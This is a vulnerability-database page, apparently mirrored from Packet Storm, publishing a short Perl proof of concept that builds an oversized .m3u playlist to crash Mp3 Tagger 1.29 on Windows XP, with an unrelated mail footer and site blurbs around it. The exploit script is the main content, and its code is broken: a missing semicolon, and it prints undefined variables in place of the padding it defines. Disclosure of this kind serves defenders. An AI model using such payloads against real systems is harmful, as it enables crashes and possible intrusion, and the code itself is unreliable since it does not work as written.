Lucene search
K

MP3 Tagger 1.29 Proof Of Concept

🗓️ 24 Jan 2010 00:00:00Reported by SkuLL-HacKeRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Mp3 Tagger 1.29 (m3u File) Local Crash PoC. Tested on windows XP SP3

Code
`  
  
#####################################################  
#!/usr/bin/perl  
# Mp3 Tagger 1.29 (m3u File) Local Crash PoC  
# by: SkuLL-HacKeR  
# Tested on: windows XP SP3  
#####################################################  
my $boom = "A" x 1526  
my $file = "b0m.m3u";  
open(my $FILE, ">>$file") or die "Cannot open $file: $!";  
print $FILE $header.$crash;  
close($FILE);  
print "Done \n";  
  
  
________________________________  
Windows Live: rendi più semplice per i tuoi amici vedere cosa stai facendo su Facebook.<http://www.microsoft.com/italy/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:it-it:SI_SB_2:092010>  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation